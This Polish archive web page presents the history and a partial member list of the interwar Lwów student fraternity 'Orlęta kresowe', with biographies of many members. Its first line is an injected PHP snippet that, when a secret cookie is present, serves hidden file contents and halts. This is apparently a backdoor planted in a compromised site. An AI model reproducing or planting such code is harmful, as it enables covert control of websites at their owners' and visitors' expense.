if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Orlęta kresowe

Dekiel NN. Nazwa:
Polska Akademicka Korporacja “Orlęta kresowe”
Siedziba:
Lwów
Data powstania:
marzec 1928 r.
Barwy:
biała – złota – czerwona
Dewiza:
„Ojczyzna, Nauka, Cnota”

Rys historyczny

IX Komers Rocznicowy Korporacji Orlęta, Lwów 14 III 1937 r.

Orlęta została założona przez grupę studentów Uniwersytetu Jana Kazimierza, Politechniki Lwowskiej, Akademii Medycyny Weterynaryjnej oraz Akademii Handlu Zagranicznego w marcu 1928 r. W związku z brakiem zgody uczelni na nazwę “Orlęta” ustalono nazwę związku na “Polska Akademicka Korporacja ‘Orlęta kresowe’, ale na codzień używano nazwy “Orlęta”.

Należała do korporacji chrześcijańskich i od maja 1928 r. członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Orlęta była we Lwowie największą korporacją reprezentującą ten profil ideowy. Korporacja blisko współpracowała z Towarzystwem Szkoły Ludowej.

W semestrze zimowym 1933/34 Orlęta połączyła się z lwowską K! Szczerbiec. Oficjalna nazwa korporacji nie uległa zmianie, ale od tego czasu powszechnie używano nazwy “Orlęta-Szczerbiec”. W nieznanych okolicznościach w lutym 1938 r. z połączonych korporacji wyłoniła się ponownie K! Szczerbiec.

Korporacja Orlęta na Pielgrzymce Młodzieży Akademickiej, Częstochowa 24 V 1936 r.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 68 nazwiska, w tym dwóch członków honorowych.

Brak informacji o działalności Korporacji Orlęta oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

Poniższa, niekompletna lista członków Orlęta obejmuje ponad pięćdziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Wiktor Hłasko, ojciec Henryka (Orlęta), naczelny dyrektor Koncernu Naftowego “Małopolska”, pełnomocnik Grupy Francuskich Towarzystw Naftowych, Przemysłowych i Handlowych - Małopolska, dyrektor firmy naftowej Verdatok w Polance k. Krosna, Filister honorowy Korporacji Orlęta
 2. Aleksy Klawek, (11 maja 1890 w Rogoźnie - 22 listopada 1969 w Katowicach) s. Ignacego i Anny z Krupików, uczeń Gimnazjum w Rogoźnie, alumn seminariów duchownych w Poznaniu i Gnieźnie 1909-13, święcenia kapłańskie w Gnieźnie 1913, student biblistyki i orientalistyki na uniwersytetach w Munster, Monachium i Wrocławiu 1914-17 oraz asyrologii na uniwersytecie w Paryżu 1922, dr teologii Munster 1917, wykładowca biblistyki w gnieźnieńskim i poznańskim seminarium 1919-22, habilitacja UJK 1923, od 1923 prof. nadzw. UJK, kierownik Katedry Starego Testamentu 1923-39, prof. zw. 1929, dziekan Wydziału Teologicznego 1926/27 oraz prorektor UJK 1933/34, duszpasterz akademicki, Filister honorowy Korporacji Orlęta, Filister honorowy Lwowskiego Koła Międzykorporacyjnego, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, w czasie wojny m.in. więziony przez Niemców, po wojnie wykładowca UJ 1945-66, kierownik Katedry Starego Testamentu 1945-54 oraz dziekan Wydziału Teologicznego 1947-51, od 1966 wykładowca biblistyki w Seminarium Duchownym w Krakowie, pochowany na cmentarzu parafialnym w Rogoźnie, członek honorowy Poznańskiego Towarzystwa Przyjaciół Nauk 1921 oraz Polskiego Towarzystwa Orientalistycznego 1968, od 1948 członek-korespondent PAU

Członkowie rzeczywiści

 1. Lesław Adamczak,
 2. Stanisław Bardecki,
 3. Zygmunt Biniszkiewicz,

  Czesław Blicharski, 1937 r.

 4. Czesław Blicharski, (5 lipca 1918 w Tarnopolu - ) s. Michała (kolejarz) i Zuzanna z d. Paciora, absolwent Szkoły Ćwiczeń przy Państwowym Seminarium Nauczycielskim Męskim im. Henryka Sienkiewicza w Tarnopolu, a następnie II Gimnazjum im. Juliusza Słowackiego w Tarnopolu 1936, student prawa UJK 1936-39, c. 1937, skreślony, w wojnie obronnej 1939 od 5 wrzesnia w straży obywatelskiej w Tarnopolu, w kwietniu 1940 wraz z dwoma braćmi aresztowany w czasie próby przedostania się przez granicę na Węgry, osadzony w łagrze k. Archangielska, a następnie w Workuty, żołnierz II Polskiego Korpusu PSZ, przez Persję, Indie, Płd. Afrykę dotarł do Wielkiej Brytanii, szkolony lotniczo w Wielkiej Brytanii i Kanadzie, lotnik w Dywizjonie 300 w ramach RAF (24 lotów bojowych m.in. naloty na Drezno), absolwent prawa polskiego wydziału w Oxfordzie 1945, po rozwiązaniu polskiej armii w Wielkiej Brytanii, wyemigrował do Argentyny 1949-53, a następnie do Urugwaju 1953-55, gdzie pracował dla Amerykańskiego Koncernu Tekstylnego, przyjechał do Polski w 1956 (wrócił do czekającej 16 lat sympatii), imał się różnych prac, prześladowany przez władze komunistyczne, od 1966 pracował w Biurze Prjektów BIPROMET, a następnie w Pracowni Organizacji jako tłumacz przy komputeryzacji Huty “Szopienice”, od 1978 na emeryturze, kolekcjoner i historyk-amator opisujący dzieje Tarnopola i Kresów Wschodnich, autor m.in. wspomnień “Tarnopolanina żywot nie pokorny” (1996), odznaczony Krzyżem Walecznych (za walkę w Dywizjonie 300) oraz Krzyżem Oficerskim OOP

  [Źródła (poza wskazanymi poniżej spisu członków): Czesław Blicharski, Tarnopolanina żywot nie pokorny, 1996, ss. 56-57; relacja Czesława Blicharskiego]

 5. Michał Blinder, (1918? - ) ze Lwowa, student prawa UJK, fuksmajor ok. 1937, przeszedł przez Rosję, był w polskiej marynarce w Anglii, po wojnie wrócił do kraju
 6. Lucjan Cepa, student PL (?), założyciel Korporacji Orlęta

  Ignacy Człowiekowski, 1937 r.

 7. Ignacy Człowiekowski, (ok. 1915/16 - ok. 2008) z Krosna, student prawa UJK 1935-37, w 1939 przez Węgry dostał się do Francji, uczestniczył w kampanii francuskiej 1940, dostał się do Szwajcarii, gdzie ukończył prawo i ekonomię, po wojnie w Wielkiej Brytanii, a następnie w Kanadzie, działacz polonijny

 8. Marian Danielec,
 9. Józef Dorosiński, z Przemyśla
 10. Stanisław Gamski, inż. lądowy, płk LWP, wykładowca budowy lotnisk PW

  Józef Giebułtowicz, 1937 r.

 11. Józef Giebułtowicz,

 12. Jan Głowacz, założyciel Korporacji Orlęta
 13. Witold Goszkowski (Góżkowski), członek Korporacji Szczerbiec, po wojnie dyrektor administracyjny PŚ w Gliwicach

  Leszek Grodecki, 1937 r.

 14. Leszek Grodecki, student prawa UJK 1938-39, po wojnie w latach 50-tych na emigracji w Argentynie

 15. Gromnicki,
 16. Wojciech Gutowski,
 17. Zygmunt Happach,
 18. Józef Hasny (Hassny), c. 1926/27 Scythia, założyciel Orląt kresowych
 19. Henryk Hłasko, s. Wiktora (Orlęta), założyciel Korporacji Orlęta, w okresie wojny dowódca plutonu w Ośrodku I AK Grójec ps. „Damazy”
 20. Tymoteusz Kajzer,
 21. Tadeusz Kalita, z Sambora, student prawa UJK 1936-39
 22. Kaczmarek
 23. Tadeusz Kaczmarczyk,
 24. Adam Karasiński, (2 luty 1905 w Oświęcimiu - 1940 w Charkowie), student Wydziału Mechanicznego PL, inż., ppor. rez., więzień Ostaszkowa, zamordowany przez NKWD
 25. Władysław Karocki, wiceprezes 1933
 26. Stefan Karolewicz,
 27. Tadeusz Kłodnicki, student PL, założyciel Korporacji Orlęta, prezes Lwowskiego Koła Środowiskowego Polskach Akademickich Korporacji Chrześcijańskich 1928 oraz 1932, wiceprezes Koła Inżynierów Lądowych 1934, inż. lądowy
 28. Koczij
 29. Andrzej Kopciński,
 30. Bronisław Kopyciński, założyciel Korporacji Orlęta
 31. Stanisław Kowalczyk,
 32. Jerzy Kozubowski, lekarz

  Roman Krzemień, 1937 r.

 33. Roman Krzemień, polonista, wiceprezes 1934

 34. Zbigniew Krzyworączka, (ok. 1900 - ) z Grzymałowa w woj. tarnopolskim, inż. geodeta
 35. Zdzisław Kwaśniewski, (19 grudnia 1909 - 1978 w Łodzi) s. wojewody lwowskiego, absolwent VI (?) Gimnazjum we Lwowie 1927, student i absolwent 1931 prawa UJK, akt. 1927-32 Gasconia (?), później członek Szczerbca, po wojnie adwokat w Łodzi

  Jerzy Meinhardt, 1937 r.

 36. Jerzy Meinhardt, (1915 - ) z Przemyśla, absolwent IV Gimnazjum im. J. Długosza we Lwowie (?), student prawa UJK, członek NOW, zamordowany przez Gestapo (?)

 37. Tadeusz Mędrzycki,

  Mieczysław Michałowicz, 1937 r.

 38. Mieczysław Michałowicz, (ok. 1936/37 - ) z Mostów Wielkich, student filozofii UJK, a następnie med. UJK, przydomek, używał imienia Mieczysława ps. Meka, w 1940 wywieziony do Kazachstanu, gdzie pracował jako felczer, skończył wydział med. w Edynburgu, pozostał na emigracji

 39. Ludwik Michałowski
 40. Leon Mrzygłocki, (ok. 1910/12 - 1993) absolwent II Państwowe Gimnazjum im. Juliusza Słowackiego we Lwowie, student i absolwent prawa UJK, kierownik Caritasu na UJK, działacz SN oraz Towarzystwa Szkoły Ludowej, delegat rządu na woj. tarnopolskie

  Józef Narożański, 1937 r.

 41. Józef Narożański, (3 lipca 1911 w Horodnicy na Podolu - 18 maja 1974 w Rzymie) absolwent IV Gimnazjum im. J. Długosza we Lwowie, student i absolwent prawa UJK, prezes Czytelni Akademickiej, prezes Młodzieży Wszechpolskiej we Lwowie, kpt. art. II Korpusu, walczył m.in. pod Tobrukiem i Monte Cassino, po wojnie pozostał na emigracji w Wielkiej Brytanii, wiceprezes SN w Wielkiej Brytanii, pochowany na South Ealing w Londynie, odznaczony Krzyżem Walecznych oraz Srebrnym Krzyżu Zasługi z Mieczami

 42. Jerzy Onyszkiewicz, założyciel Korporacji Orlęta
 43. Karol Piszczek, ze Stryja

  Zygmunt Płaczkiewicz, 1936 r.

 44. Zygmunt Płaczkiewicz, (15 lutego 1916 w Humaniu - 15 lutego 1963 w Katowicach) s. Leona (lekarza i wieloletniego ordynatora Szpitala św. Jana w Lublinie) i Wandy z Przybylskich, absolwent Gimnazjum Humanistycznego w Chyrowie, student i absolwent (mgr prawa) prawa UJK 1935-38, członek Falangi, wykluczony cum infamia za udział w napadzie na redaktora naczelnego “Słowa Narodowego” Jana Matysika 1938, w czasie wojny pracował w Zarządzie Miasta w referacie transportu Białej Podlaskiej, po wojnie osiadł i pracował jako naczelnik Urzędu Samochodowego, a od 1949 jako adwokat w Katowicach, pochowany na cmentarzu katolickim w Katowicach, miał żonę Helenę i syna Jerzego [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Jerzego Płaczkiewicza]

 45. Belina-Prażmowski, malarz
 46. Alojzy Postulka, założyciel Korporacji Orlęta
 47. Rohlman (Kohlman)

  Jerzy Ruebenbauer, 1937 r.

 48. Jerzy Ruebenbauer, ( - ok. 1994) założyciel Korporacji Orlęta, inż. wodny, po wojnie na emigracji w Kanadzie

 49. Zbigniew Schoentaler,
 50. Ludwik Serafinowski
 51. Kazimierz Sipczyński,
 52. Stanisław Skowroński,
 53. Roman Sołony
 54. Bolesław Stankiewicz,
 55. Zygmunt Stelmach,

  Struś, 1936 r.

 56. Struś, z Dobromila

  Stanisław Strycharski, 1936 r.

 57. Stanisław Strycharski, (20 grudnia 1915 we Lwowie - 23 kwietnia 2000 w Bytomiu) absolwent IV Gimnazjum im. Jana Długosza we Lwowie, student prawa UJK, c. 1933, kilkukrotny prezes i olderman, prezes Lwowskiego Koła Środowiska Zjednoczenia i Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1939, prezes Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich, członek i prezes Młodzieży Wszechpolskiej na UJK, absolwent UJK, w marcu 1940 aresztowany przez NKWD i skazany na karę śmierci, uratowany, od 1942 żołnierz NOW we Lwowie ps. “Jastrzębiec”, adwokat, pochowany na cmentarzu w Bytomiu

 58. Tadeusz Szczurek,

  Tadeusz Świderski, 1937 r.

 59. Tadeusz Świderski, z Jaworowa

 60. Andrzej Świerczyński, członek Korporacji Szczerbiec, prawnik, adwokat, po wojnie na emigracji w Wielkiej Brytanii
 61. Mieczysław Trojnarski,
 62. Eugeniusz Wilczyński, założyciel Korporacji Orlęta
 63. Mieczysław Wojtyna, (1917 - 10 kwietnia 1977) student prawa UJK, członek Korporacji Szczerbiec, adiunkt w Instytucie Nauk Społecznych i Ekonomicznych PK, dr hab., autor wielu prac z zakresu prawa cywilnego, odznaczony Złotym Krzyżem Zasługi i Złotą Odznaką ZNP

  Roman Woycicki, 1937 r.

 64. Roman Woycicki (Wójcicki),

 65. Władysław Zawadzki
 66. Zdzisław Ziemiakowski, absolwent prawa UJK

Listę członków opracowano na podstawie:

1) Stanisław Strycharski, Lista członków Polskiej Korporacji Akademickiej Orlęta (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 105 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Orlęta.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 13 IX 2010 r.
Ostatnia zmiana: 28 VII 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja “Orlęta kresowe” (Lwów), (na:) www.archiwumkorporacyjne.pl, stan 28 VII 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }